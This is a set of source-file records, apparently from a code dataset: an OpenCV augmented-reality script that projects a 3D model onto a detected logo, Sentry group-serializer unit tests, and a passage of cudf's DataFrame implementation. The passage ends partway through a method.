] | null | null | null | src/ar_main2.py | mtc-20/augmented-reality | f86c1df4d21b87c95fd294e4553db649ec0857a1 | [
"MIT"
] | null | null | null | src/ar_main2.py | mtc-20/augmented-reality | f86c1df4d21b87c95fd294e4553db649ec0857a1 | [
"MIT"
] | 1 | 2021-07-02T10:42:30.000Z | 2021-07-02T10:42:30.000Z | '''
Created on Saturday, 31st October 2019
@author: mtc-20
Coded on VS Code 2019
------
Overview:
------
Last Modified: Sun Oct 04 2020
'''
# Useful links
# http://www.pygame.org/wiki/OBJFileLoader
# TODO -> Implement command line arguments (scale, model and object to be projected)
# TODO -> Refactor and organize code (proper function definition and separation, classes, error handling...)
from __future__ import print_function
import argparse
import cv2
import numpy as np
import math
import os
from objloader_simple import *
import time
# Minimum number of matches that have to be found
# to consider the recognition valid
MIN_MATCHES = 30
def main():
"""
    This function loads the reference surface image, sets up the ORB keypoint
    detector and matcher, loads the 3D model, and runs the AR loop on the webcam feed.
"""
homography = None
# matrix of camera parameters (made up but works quite well for me)
camera_parameters = np.array([[800, 0, 320], [0, 800, 240], [0, 0, 1]])
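    # (The matrix above is a standard pinhole intrinsic matrix [[fx, 0, cx], [0, fy, cy], [0, 0, 1]];
    #  fx = fy = 800 and the principal point (320, 240) are rough assumptions for a 640x480 webcam.)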
# create ORB keypoint detector
orb = cv2.ORB_create()
# create BFMatcher object based on hamming distance
bf = cv2.BFMatcher(cv2.NORM_HAMMING2, crossCheck=True)
# load the reference surface that will be searched in the video stream
dir_name = os.getcwd()
model = cv2.imread(os.path.join(dir_name, './../reference/logo_black.png'), 0)
#model = cv2.flip(model, 1)
# Compute model keypoints and its descriptors
kp_model, des_model = orb.detectAndCompute(model, None)
# Load 3D model from OBJ file
obj = OBJ(os.path.join(dir_name, './../models/cow.obj'), swapyz=True)
# init video capture
cap = cv2.VideoCapture(0)
print("[INFO] Warming up camera...")
time.sleep(3)
# # save video capture
# frame_width = int(cap.get(3))
# frame_height = int(cap.get(4))
# out = cv2.VideoWriter('outpy.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 10, (frame_width,frame_height))
# #out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640,480))
while True:
# read the current frame
ret, frame = cap.read()
if not ret:
print ("[ERR] Unable to capture video!")
print("[INFO] Closing...")
break
# find and draw the keypoints of the frame
kp_frame, des_frame = orb.detectAndCompute(frame, None)
# match frame descriptors with model descriptors
matches = bf.match(des_model, des_frame)
# sort them in the order of their distance
# the lower the distance, the better the match
matches = sorted(matches, key=lambda x: x.distance)
# filter out poor matches
good = []
for i, m in enumerate(matches):
if i < len(matches) - 1 and m.distance < 0.75 * matches[i+1].distance:
good.append(m)
# compute Homography if enough matches are found
if len(matches) > MIN_MATCHES:
# differentiate between source points and destination points
src_pts = np.float32([kp_model[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)
dst_pts = np.float32([kp_frame[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)
# compute Homography
homography, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
if True: #args.rectangle:
# Draw a rectangle that marks the found model in the frame
h, w = model.shape
pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)
# project corners into frame
dst = cv2.perspectiveTransform(pts, homography)
# connect them with lines
frame = cv2.polylines(frame, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)
# if a valid homography matrix was found render cube on model plane
if homography is not None:
try:
# obtain 3D projection matrix from homography matrix and camera parameters
projection = projection_matrix(camera_parameters, homography)
# project cube or model
frame = render(frame, obj, projection, model, False)
#frame = render(frame, model, projection)
except:
pass
# draw first 10 matches.
if True: #args.matches:
frame = cv2.drawMatches(model, kp_model, frame, kp_frame, matches[:10], 0, flags=2)
# show result
#out.write(frame)
cv2.imshow('frame', frame)
k = cv2.waitKey(1)
if k%256 == 27:
print("[INFO] User pressed Esc, closing...")
break
else:
print ("Not enough good matches found - %d/%d for %d" % (len(matches),len(good), MIN_MATCHES))
cap.release()
#out.release()
cv2.destroyAllWindows()
return 0
def render(img, obj, projection, model, color=False):
"""
Render a loaded obj model into the current video frame
"""
vertices = obj.vertices
scale_matrix = np.eye(3) * 0.2
h, w = model.shape
for face in obj.faces:
face_vertices = face[0]
points = np.array([vertices[vertex - 1] for vertex in face_vertices])
points = np.dot(points, scale_matrix)
# render model in the middle of the reference surface. To do so,
# model points must be displaced
points = np.array([[p[0] + w / 2, p[1] + h / 2, p[2]] for p in points])
dst = cv2.perspectiveTransform(points.reshape(-1, 1, 3), projection)
imgpts = np.int32(dst)
if color is False:
cv2.fillConvexPoly(img, imgpts, (109, 109, 0))
else:
color = hex_to_rgb(face[-1])
color = color[::-1] # reverse
cv2.fillConvexPoly(img, imgpts, color)
return img
def projection_matrix(camera_parameters, homography):
"""
From the camera calibration matrix and the estimated homography
compute the 3D projection matrix
"""
# Compute rotation along the x and y axis as well as the translation
homography = homography * (-1)
rot_and_transl = np.dot(np.linalg.inv(camera_parameters), homography)
col_1 = rot_and_transl[:, 0]
col_2 = rot_and_transl[:, 1]
col_3 = rot_and_transl[:, 2]
# normalise vectors
l = math.sqrt(np.linalg.norm(col_1, 2) * np.linalg.norm(col_2, 2))
rot_1 = col_1 / l
rot_2 = col_2 / l
translation = col_3 / l
# compute the orthonormal basis
c = rot_1 + rot_2
p = np.cross(rot_1, rot_2)
d = np.cross(c, p)
rot_1 = np.dot(c / np.linalg.norm(c, 2) + d / np.linalg.norm(d, 2), 1 / math.sqrt(2))
rot_2 = np.dot(c / np.linalg.norm(c, 2) - d / np.linalg.norm(d, 2), 1 / math.sqrt(2))
rot_3 = np.cross(rot_1, rot_2)
# finally, compute the 3D projection matrix from the model to the current frame
projection = np.stack((rot_1, rot_2, rot_3, translation)).T
return np.dot(camera_parameters, projection)
def hex_to_rgb(hex_color):
"""
Helper function to convert hex strings to RGB
"""
hex_color = hex_color.lstrip('#')
h_len = len(hex_color)
return tuple(int(hex_color[i:i + h_len // 3], 16) for i in range(0, h_len, h_len // 3))
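# Example (illustrative): hex_to_rgb('#ff8800') -> (255, 136, 0)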
# # Command line argument parsing
# # NOT ALL OF THEM ARE SUPPORTED YET
# parser = argparse.ArgumentParser(description='Augmented reality application')
# parser.add_argument('-r','--rectangle', help = 'draw rectangle delimiting target surface on frame', action = 'store_true')
# parser.add_argument('-mk','--model_keypoints', help = 'draw model keypoints', action = 'store_true')
# parser.add_argument('-fk','--frame_keypoints', help = 'draw frame keypoints', action = 'store_true')
# parser.add_argument('-ma','--matches', help = 'draw matches between keypoints', action = 'store_true')
# # TODO jgallostraa -> add support for model specification
# #parser.add_argument('-mo','--model', help = 'Specify model to be projected', action = 'store_true')
# args = parser.parse_args()
if __name__ == '__main__':
main()
| 39.029126 | 124 | 0.620025 |
ee8e7cda6e4ce11412f226862a21abfa73fc316c | 15,251 | py | Python | tests/snuba/api/serializers/test_group.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | tests/snuba/api/serializers/test_group.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | tests/snuba/api/serializers/test_group.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from sentry.utils.compat import mock
import six
from datetime import timedelta
from django.utils import timezone
from sentry.utils.compat.mock import patch
from sentry.api.serializers import serialize
from sentry.api.serializers.models.group import (
GroupSerializerSnuba,
StreamGroupSerializerSnuba,
snuba_tsdb,
)
from sentry.models import (
Group,
Environment,
GroupEnvironment,
GroupLink,
GroupResolution,
GroupSnooze,
GroupStatus,
GroupSubscription,
UserOption,
UserOptionValue,
)
from sentry.testutils import APITestCase, SnubaTestCase
from sentry.testutils.helpers.datetime import iso_format, before_now
class GroupSerializerSnubaTest(APITestCase, SnubaTestCase):
def setUp(self):
super(GroupSerializerSnubaTest, self).setUp()
self.min_ago = before_now(minutes=1)
self.day_ago = before_now(days=1)
self.week_ago = before_now(days=7)
def test_permalink(self):
group = self.create_group()
result = serialize(group, self.user, serializer=GroupSerializerSnuba())
assert "http://" in result["permalink"]
assert "{}/issues/{}".format(group.organization.slug, group.id) in result["permalink"]
def test_permalink_outside_org(self):
outside_user = self.create_user()
group = self.create_group()
result = serialize(group, outside_user, serializer=GroupSerializerSnuba())
assert result["permalink"] is None
def test_is_ignored_with_expired_snooze(self):
now = timezone.now()
user = self.create_user()
group = self.create_group(status=GroupStatus.IGNORED)
GroupSnooze.objects.create(group=group, until=now - timedelta(minutes=1))
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "unresolved"
assert result["statusDetails"] == {}
def test_is_ignored_with_valid_snooze(self):
now = timezone.now()
user = self.create_user()
group = self.create_group(status=GroupStatus.IGNORED)
snooze = GroupSnooze.objects.create(group=group, until=now + timedelta(minutes=1))
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "ignored"
assert result["statusDetails"]["ignoreCount"] == snooze.count
assert result["statusDetails"]["ignoreWindow"] == snooze.window
assert result["statusDetails"]["ignoreUserCount"] == snooze.user_count
assert result["statusDetails"]["ignoreUserWindow"] == snooze.user_window
assert result["statusDetails"]["ignoreUntil"] == snooze.until
assert result["statusDetails"]["actor"] is None
def test_is_ignored_with_valid_snooze_and_actor(self):
now = timezone.now()
user = self.create_user()
group = self.create_group(status=GroupStatus.IGNORED)
GroupSnooze.objects.create(group=group, until=now + timedelta(minutes=1), actor_id=user.id)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "ignored"
assert result["statusDetails"]["actor"]["id"] == six.text_type(user.id)
def test_resolved_in_next_release(self):
release = self.create_release(project=self.project, version="a")
user = self.create_user()
group = self.create_group(status=GroupStatus.RESOLVED)
GroupResolution.objects.create(
group=group, release=release, type=GroupResolution.Type.in_next_release
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"] == {"inNextRelease": True, "actor": None}
def test_resolved_in_release(self):
release = self.create_release(project=self.project, version="a")
user = self.create_user()
group = self.create_group(status=GroupStatus.RESOLVED)
GroupResolution.objects.create(
group=group, release=release, type=GroupResolution.Type.in_release
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"] == {"inRelease": "a", "actor": None}
def test_resolved_with_actor(self):
release = self.create_release(project=self.project, version="a")
user = self.create_user()
group = self.create_group(status=GroupStatus.RESOLVED)
GroupResolution.objects.create(
group=group, release=release, type=GroupResolution.Type.in_release, actor_id=user.id
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"]["actor"]["id"] == six.text_type(user.id)
def test_resolved_in_commit(self):
repo = self.create_repo(project=self.project)
commit = self.create_commit(repo=repo)
user = self.create_user()
group = self.create_group(status=GroupStatus.RESOLVED)
GroupLink.objects.create(
group_id=group.id,
project_id=group.project_id,
linked_id=commit.id,
linked_type=GroupLink.LinkedType.commit,
relationship=GroupLink.Relationship.resolves,
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"]["inCommit"]["id"] == commit.key
@patch("sentry.models.Group.is_over_resolve_age")
def test_auto_resolved(self, mock_is_over_resolve_age):
mock_is_over_resolve_age.return_value = True
user = self.create_user()
group = self.create_group(status=GroupStatus.UNRESOLVED)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"] == {"autoResolved": True}
def test_subscribed(self):
user = self.create_user()
group = self.create_group()
GroupSubscription.objects.create(
user=user, group=group, project=group.project, is_active=True
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["isSubscribed"]
assert result["subscriptionDetails"] == {"reason": "unknown"}
def test_explicit_unsubscribed(self):
user = self.create_user()
group = self.create_group()
GroupSubscription.objects.create(
user=user, group=group, project=group.project, is_active=False
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert not result["isSubscribed"]
assert not result["subscriptionDetails"]
def test_implicit_subscribed(self):
user = self.create_user()
group = self.create_group()
combinations = (
# ((default, project), (subscribed, details))
((UserOptionValue.all_conversations, None), (True, None)),
((UserOptionValue.all_conversations, UserOptionValue.all_conversations), (True, None)),
(
(UserOptionValue.all_conversations, UserOptionValue.participating_only),
(False, None),
),
(
(UserOptionValue.all_conversations, UserOptionValue.no_conversations),
(False, {"disabled": True}),
),
((None, None), (False, None)),
((UserOptionValue.participating_only, None), (False, None)),
((UserOptionValue.participating_only, UserOptionValue.all_conversations), (True, None)),
(
(UserOptionValue.participating_only, UserOptionValue.participating_only),
(False, None),
),
(
(UserOptionValue.participating_only, UserOptionValue.no_conversations),
(False, {"disabled": True}),
),
((UserOptionValue.no_conversations, None), (False, {"disabled": True})),
((UserOptionValue.no_conversations, UserOptionValue.all_conversations), (True, None)),
((UserOptionValue.no_conversations, UserOptionValue.participating_only), (False, None)),
(
(UserOptionValue.no_conversations, UserOptionValue.no_conversations),
(False, {"disabled": True}),
),
)
def maybe_set_value(project, value):
if value is not None:
UserOption.objects.set_value(
user=user, project=project, key="workflow:notifications", value=value
)
else:
UserOption.objects.unset_value(
user=user, project=project, key="workflow:notifications"
)
for options, (is_subscribed, subscription_details) in combinations:
default_value, project_value = options
UserOption.objects.clear_local_cache()
maybe_set_value(None, default_value)
maybe_set_value(group.project, project_value)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["isSubscribed"] is is_subscribed
assert result.get("subscriptionDetails") == subscription_details
def test_global_no_conversations_overrides_group_subscription(self):
user = self.create_user()
group = self.create_group()
GroupSubscription.objects.create(
user=user, group=group, project=group.project, is_active=True
)
UserOption.objects.set_value(
user=user,
project=None,
key="workflow:notifications",
value=UserOptionValue.no_conversations,
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert not result["isSubscribed"]
assert result["subscriptionDetails"] == {"disabled": True}
def test_project_no_conversations_overrides_group_subscription(self):
user = self.create_user()
group = self.create_group()
GroupSubscription.objects.create(
user=user, group=group, project=group.project, is_active=True
)
UserOption.objects.set_value(
user=user,
project=group.project,
key="workflow:notifications",
value=UserOptionValue.no_conversations,
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert not result["isSubscribed"]
assert result["subscriptionDetails"] == {"disabled": True}
def test_no_user_unsubscribed(self):
group = self.create_group()
result = serialize(group, serializer=GroupSerializerSnuba())
assert not result["isSubscribed"]
def test_seen_stats(self):
environment = self.create_environment(project=self.project)
environment2 = self.create_environment(project=self.project)
events = []
for event_id, env, user_id, timestamp in [
("a" * 32, environment, 1, iso_format(self.min_ago)),
("b" * 32, environment, 2, iso_format(self.min_ago)),
("c" * 32, environment2, 3, iso_format(self.week_ago)),
]:
events.append(
self.store_event(
data={
"event_id": event_id,
"fingerprint": ["put-me-in-group1"],
"timestamp": timestamp,
"environment": env.name,
"user": {"id": user_id},
},
project_id=self.project.id,
)
)
# Assert all events are in the same group
(group_id,) = set(e.group.id for e in events)
group = Group.objects.get(id=group_id)
group.times_seen = 3
group.first_seen = self.week_ago - timedelta(days=5)
group.last_seen = self.week_ago
group.save()
# should use group columns when no environments arg passed
result = serialize(group, serializer=GroupSerializerSnuba(environment_ids=[]))
assert result["count"] == "3"
assert iso_format(result["lastSeen"]) == iso_format(self.min_ago)
assert result["firstSeen"] == group.first_seen
# update this to something different to make sure it's being used
group_env = GroupEnvironment.objects.get(group_id=group_id, environment_id=environment.id)
group_env.first_seen = self.day_ago - timedelta(days=3)
group_env.save()
group_env2 = GroupEnvironment.objects.get(group_id=group_id, environment_id=environment2.id)
result = serialize(
group,
serializer=GroupSerializerSnuba(environment_ids=[environment.id, environment2.id]),
)
assert result["count"] == "3"
# result is rounded down to nearest second
assert iso_format(result["lastSeen"]) == iso_format(self.min_ago)
assert iso_format(result["firstSeen"]) == iso_format(group_env.first_seen)
assert iso_format(group_env2.first_seen) > iso_format(group_env.first_seen)
assert result["userCount"] == 3
# test userCount, count, lastSeen filtering correctly by time
# firstSeen should still be from GroupEnvironment
result = serialize(
group,
serializer=GroupSerializerSnuba(
environment_ids=[environment.id, environment2.id],
start=self.week_ago - timedelta(hours=1),
end=self.week_ago + timedelta(hours=1),
),
)
assert result["userCount"] == 1
assert iso_format(result["lastSeen"]) == iso_format(self.week_ago)
assert iso_format(result["firstSeen"]) == iso_format(group_env.first_seen)
assert result["count"] == "1"
class StreamGroupSerializerTestCase(APITestCase, SnubaTestCase):
def test_environment(self):
group = self.group
environment = Environment.get_or_create(group.project, "production")
with mock.patch(
"sentry.api.serializers.models.group.snuba_tsdb.get_range",
side_effect=snuba_tsdb.get_range,
) as get_range:
serialize(
[group],
serializer=StreamGroupSerializerSnuba(
environment_ids=[environment.id], stats_period="14d"
),
)
assert get_range.call_count == 1
for args, kwargs in get_range.call_args_list:
assert kwargs["environment_ids"] == [environment.id]
with mock.patch(
"sentry.api.serializers.models.group.snuba_tsdb.get_range",
side_effect=snuba_tsdb.get_range,
) as get_range:
serialize(
[group],
serializer=StreamGroupSerializerSnuba(environment_ids=None, stats_period="14d"),
)
assert get_range.call_count == 1
for args, kwargs in get_range.call_args_list:
assert kwargs["environment_ids"] is None
| 39.819843 | 100 | 0.636548 |
81e2a80dc6b2977de2314bab6b2a9b336abfe7ed | 54,099 | py | Python | python/cudf/dataframe/dataframe.py | OlivierNV/cudf | 7aa3799e73948899a85e70bc73d3cea50b65dff1 | [
"Apache-2.0"
] | 1 | 2019-08-13T17:19:42.000Z | 2019-08-13T17:19:42.000Z | python/cudf/dataframe/dataframe.py | OlivierNV/cudf | 7aa3799e73948899a85e70bc73d3cea50b65dff1 | [
"Apache-2.0"
] | null | null | null | python/cudf/dataframe/dataframe.py | OlivierNV/cudf | 7aa3799e73948899a85e70bc73d3cea50b65dff1 | [
"Apache-2.0"
] | 1 | 2019-08-13T17:19:45.000Z | 2019-08-13T17:19:45.000Z | # Copyright (c) 2018, NVIDIA CORPORATION.
from __future__ import print_function, division
import inspect
import random
from collections import OrderedDict
import warnings
import numpy as np
import pandas as pd
import pyarrow as pa
from numba.cuda.cudadrv.devicearray import DeviceNDArray
from librmm_cffi import librmm as rmm
from cudf import formatting, _gdf
from cudf.utils import cudautils, queryutils, applyutils, utils
from .index import GenericIndex, Index, RangeIndex
from .series import Series
from .column import Column
from cudf.settings import NOTSET, settings
from cudf.comm.serialize import register_distributed_serializer
from .categorical import CategoricalColumn
from .datetime import DatetimeColumn
from .numerical import NumericalColumn
from .buffer import Buffer
from cudf._gdf import nvtx_range_push, nvtx_range_pop
import cudf.bindings.join as cpp_join
class DataFrame(object):
"""
A GPU Dataframe object.
Examples
--------
Build dataframe with `__setitem__`:
.. code-block:: python
from cudf.dataframe import DataFrame
df = DataFrame()
df['key'] = [0, 1, 2, 3, 4]
df['val'] = [float(i + 10) for i in range(5)] # insert column
print(df)
Output:
.. code-block:: python
key val
0 0 10.0
1 1 11.0
2 2 12.0
3 3 13.0
4 4 14.0
Build dataframe with initializer:
.. code-block:: python
from cudf.dataframe import DataFrame
import numpy as np
import datetime as dt
ids = np.arange(5)
# Create some datetime data
t0 = dt.datetime.strptime('2018-10-07 12:00:00', '%Y-%m-%d %H:%M:%S')
datetimes = [(t0+ dt.timedelta(seconds=x)) for x in range(5)]
dts = np.array(datetimes, dtype='datetime64')
# Create the GPU DataFrame
df = DataFrame([('id', ids), ('datetimes', dts)])
print(df)
Output:
.. code-block:: python
id datetimes
0 0 2018-10-07T12:00:00.000
1 1 2018-10-07T12:00:01.000
2 2 2018-10-07T12:00:02.000
3 3 2018-10-07T12:00:03.000
4 4 2018-10-07T12:00:04.000
Convert from a Pandas DataFrame:
.. code-block:: python
import pandas as pd
        from cudf.dataframe import DataFrame
pdf = pd.DataFrame({'a': [0, 1, 2, 3],'b': [0.1, 0.2, None, 0.3]})
df = DataFrame.from_pandas(pdf)
print(df)
Output:
.. code-block:: python
a b
0 0 0.1
1 1 0.2
2 2 nan
3 3 0.3
"""
def __init__(self, name_series=None, index=None):
if index is None:
index = RangeIndex(start=0)
self._index = index
self._size = len(index)
self._cols = OrderedDict()
# has initializer?
if name_series is not None:
if isinstance(name_series, dict):
name_series = name_series.items()
for k, series in name_series:
self.add_column(k, series, forceindex=index is not None)
def serialize(self, serialize):
header = {}
frames = []
header['index'], index_frames = serialize(self._index)
header['index_frame_count'] = len(index_frames)
frames.extend(index_frames)
# Use the column directly to avoid duplicating the index
columns = [col._column for col in self._cols.values()]
serialized_columns = zip(*map(serialize, columns))
header['columns'], column_frames = serialized_columns
header['column_names'] = tuple(self._cols)
for f in column_frames:
frames.extend(f)
return header, frames
@classmethod
def deserialize(cls, deserialize, header, frames):
# Reconstruct the index
index_header = header['index']
index_frames = frames[:header['index_frame_count']]
index = deserialize(index_header, index_frames)
# Reconstruct the columns
column_frames = frames[header['index_frame_count']:]
columns = []
for k, meta in zip(header['column_names'], header['columns']):
col_frame_count = meta['frame_count']
colobj = deserialize(meta, column_frames[:col_frame_count])
columns.append((k, colobj))
# Advance frames
column_frames = column_frames[col_frame_count:]
return cls(columns, index=index)
@property
def dtypes(self):
"""Return the dtypes in this object."""
return pd.Series([x.dtype for x in self._cols.values()],
index=self._cols.keys())
@property
def shape(self):
"""Returns a tuple representing the dimensionality of the DataFrame.
"""
return len(self), len(self._cols)
def __dir__(self):
o = set(dir(type(self)))
o.update(self.__dict__)
o.update(c for c in self.columns if
(isinstance(c, pd.compat.string_types) and
pd.compat.isidentifier(c)))
return list(o)
def __getattr__(self, key):
if key != '_cols' and key in self._cols:
return self[key]
raise AttributeError("'DataFrame' object has no attribute %r" % key)
def __getitem__(self, arg):
"""
If *arg* is a ``str``, return the column Series.
If *arg* is a ``slice``, return a new DataFrame with all columns
sliced to the specified range.
If *arg* is an ``array`` containing column names, return a new
DataFrame with the corresponding columns.
Examples
--------
>>> df = DataFrame([('a', list(range(20))),
... ('b', list(range(20))),
... ('c', list(range(20)))])
>>> df[:4] # get first 4 rows of all columns
a b c
0 0 0 0
1 1 1 1
2 2 2 2
3 3 3 3
>>> df[-5:] # get last 5 rows of all columns
a b c
15 15 15 15
16 16 16 16
17 17 17 17
18 18 18 18
19 19 19 19
>>>df[['a','c']] # get columns a and c
a c
0 0 0
1 1 1
2 2 2
3 3 3
"""
if isinstance(arg, str) or isinstance(arg, int):
s = self._cols[arg]
s.name = arg
return s
elif isinstance(arg, slice):
df = DataFrame()
for k, col in self._cols.items():
df[k] = col[arg]
return df
elif isinstance(arg, (list,)):
df = DataFrame()
for col in arg:
df[col] = self[col]
return df
else:
msg = "__getitem__ on type {!r} is not supported"
raise TypeError(msg.format(arg))
def __setitem__(self, name, col):
"""Add/set column by *name*
"""
if name in self._cols:
self._cols[name] = self._prepare_series_for_add(col)
else:
self.add_column(name, col)
def __delitem__(self, name):
"""
Drop the given column by *name*.
"""
self.drop_column(name)
def __sizeof__(self):
return sum(col.__sizeof__() for col in self._cols.values())
def __len__(self):
"""
Returns the number of rows
"""
return self._size
def assign(self, **kwargs):
"""
Assign columns to DataFrame from keyword arguments.
Examples
--------
.. code-block:: python
import cudf
df = cudf.dataframe.DataFrame()
df = df.assign(a=[0,1,2], b=[3,4,5])
print(df)
Output:
.. code-block:: python
a b
0 0 3
1 1 4
2 2 5
"""
new = self.copy()
for k, v in kwargs.items():
new[k] = v
return new
def head(self, n=5):
"""
Returns the first n rows as a new DataFrame
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
df = DataFrame()
df['key'] = [0, 1, 2, 3, 4]
df['val'] = [float(i + 10) for i in range(5)] # insert column
print(df.head(2))
Output
.. code-block:: python
key val
0 0 10.0
1 1 11.0
"""
return self[:n]
def to_string(self, nrows=NOTSET, ncols=NOTSET):
"""
Convert to string
Parameters
----------
nrows : int
Maximum number of rows to show.
If it is None, all rows are shown.
ncols : int
Maximum number of columns to show.
If it is None, all columns are shown.
Examples
--------
.. code-block:: python
            from cudf.dataframe import DataFrame
df = DataFrame()
df['key'] = [0, 1, 2]
df['val'] = [float(i + 10) for i in range(3)]
df.to_string()
Output:
.. code-block:: python
' key val\\n0 0 10.0\\n1 1 11.0\\n2 2 12.0'
"""
if nrows is NOTSET:
nrows = settings.formatting.get('nrows')
if ncols is NOTSET:
ncols = settings.formatting.get('ncols')
if nrows is None:
nrows = len(self)
else:
nrows = min(nrows, len(self)) # cap row count
if ncols is None:
ncols = len(self.columns)
else:
ncols = min(ncols, len(self.columns)) # cap col count
more_cols = len(self.columns) - ncols
more_rows = len(self) - nrows
# Prepare cells
cols = OrderedDict()
use_cols = list(self.columns[:ncols - 1])
if ncols > 0:
use_cols.append(self.columns[-1])
for h in use_cols:
cols[h] = self[h].values_to_string(nrows=nrows)
# Format into a table
return formatting.format(index=self._index, cols=cols,
show_headers=True, more_cols=more_cols,
more_rows=more_rows)
def __str__(self):
nrows = settings.formatting.get('nrows') or 10
ncols = settings.formatting.get('ncols') or 8
return self.to_string(nrows=nrows, ncols=ncols)
def __repr__(self):
return "<cudf.DataFrame ncols={} nrows={} >".format(
len(self.columns),
len(self),
)
@property
def loc(self):
"""
Returns a label-based indexer for row-slicing and column selection.
Examples
--------
>>> df = DataFrame([('a', list(range(20))),
... ('b', list(range(20))),
... ('c', list(range(20)))])
# get rows from index 2 to index 5 from 'a' and 'b' columns.
>>> df.loc[2:5, ['a', 'b']]
a b
2 2 2
3 3 3
4 4 4
5 5 5
"""
return Loc(self)
@property
def columns(self):
"""Returns a tuple of columns
"""
return pd.Index(self._cols)
@property
def index(self):
"""Returns the index of the DataFrame
"""
return self._index
def set_index(self, index):
"""Return a new DataFrame with a new index
Parameters
----------
index : Index, Series-convertible, or str
Index : the new index.
Series-convertible : values for the new index.
str : name of column to be used as series
"""
# When index is a column name
if isinstance(index, str):
df = self.copy()
df.drop_column(index)
return df.set_index(self[index])
# Otherwise
else:
index = index if isinstance(index, Index) else GenericIndex(index)
df = DataFrame()
for k in self.columns:
df[k] = self[k].set_index(index)
return df
def reset_index(self):
return self.set_index(RangeIndex(len(self)))
def take(self, positions, ignore_index=False):
out = DataFrame()
for col in self.columns:
out[col] = self[col].take(positions, ignore_index=ignore_index)
return out
def copy(self):
"""
Returns a copy of this dataframe
"""
df = DataFrame()
df._index = self._index
df._size = self._size
df._cols = self._cols.copy()
return df
def __copy__(self):
return self.copy()
def __deepcopy__(self, memo={}):
"""
Parameters
----------
memo, default None
Standard signature. Unused
"""
if memo is None:
memo = {}
return self.copy()
def _sanitize_columns(self, col):
"""Sanitize pre-appended
col values
"""
series = Series(col)
if len(self) == 0 and len(self.columns) > 0 and len(series) > 0:
ind = series.index
arr = rmm.device_array(shape=len(ind), dtype=np.float64)
size = utils.calc_chunk_size(arr.size, utils.mask_bitsize)
mask = cudautils.zeros(size, dtype=utils.mask_dtype)
val = Series.from_masked_array(arr, mask, null_count=len(ind))
for name in self._cols:
self._cols[name] = val
self._index = series.index
self._size = len(series)
def _sanitize_values(self, col):
"""Sanitize col values before
being added
"""
index = self._index
series = Series(col)
sind = series.index
VALID = isinstance(col, (np.ndarray, DeviceNDArray, list, Series,
Column))
if len(self) > 0 and len(series) == 1 and not VALID:
arr = rmm.device_array(shape=len(index), dtype=series.dtype)
cudautils.gpu_fill_value.forall(arr.size)(arr, col)
return Series(arr)
elif len(self) > 0 and len(sind) != len(index):
raise ValueError('Length of values does not match index length')
return col
def _prepare_series_for_add(self, col, forceindex=False):
"""Prepare a series to be added to the DataFrame.
Parameters
----------
col : Series, array-like
Values to be added.
Returns
-------
The prepared Series object.
"""
self._sanitize_columns(col)
col = self._sanitize_values(col)
empty_index = len(self._index) == 0
series = Series(col)
if forceindex or empty_index or self._index == series.index:
if empty_index:
self._index = series.index
self._size = len(series)
return series
else:
return series.set_index(self._index)
def add_column(self, name, data, forceindex=False):
"""Add a column
Parameters
----------
name : str
Name of column to be added.
data : Series, array-like
Values to be added.
"""
if name in self._cols:
raise NameError('duplicated column name {!r}'.format(name))
series = self._prepare_series_for_add(data, forceindex=forceindex)
series.name = name
self._cols[name] = series
def drop_column(self, name):
"""Drop a column by *name*
"""
if name not in self._cols:
raise NameError('column {!r} does not exist'.format(name))
del self._cols[name]
@classmethod
def _concat(cls, objs, ignore_index=False):
nvtx_range_push("PYGDF_CONCAT", "orange")
if len(set(frozenset(o.columns) for o in objs)) != 1:
what = set(frozenset(o.columns) for o in objs)
raise ValueError('columns mismatch: {}'.format(what))
objs = [o for o in objs]
if ignore_index:
index = RangeIndex(sum(map(len, objs)))
else:
index = Index._concat([o.index for o in objs])
data = [(c, Series._concat([o[c] for o in objs], index=index))
for c in objs[0].columns]
out = cls(data)
out._index = index
nvtx_range_pop()
return out
def as_gpu_matrix(self, columns=None, order='F'):
"""Convert to a matrix in device memory.
Parameters
----------
columns : sequence of str
List of a column names to be extracted. The order is preserved.
If None is specified, all columns are used.
order : 'F' or 'C'
Optional argument to determine whether to return a column major
(Fortran) matrix or a row major (C) matrix.
Returns
-------
A (nrow x ncol) numpy ndarray in "F" order.
"""
if columns is None:
columns = self.columns
cols = [self._cols[k] for k in columns]
ncol = len(cols)
nrow = len(self)
if ncol < 1:
raise ValueError("require at least 1 column")
if nrow < 1:
raise ValueError("require at least 1 row")
dtype = cols[0].dtype
if any(dtype != c.dtype for c in cols):
raise ValueError('all columns must have the same dtype')
for k, c in self._cols.items():
if c.null_count > 0:
errmsg = ("column {!r} has null values. "
"hint: use .fillna() to replace null values")
raise ValueError(errmsg.format(k))
if order == 'F':
matrix = rmm.device_array(shape=(nrow, ncol), dtype=dtype,
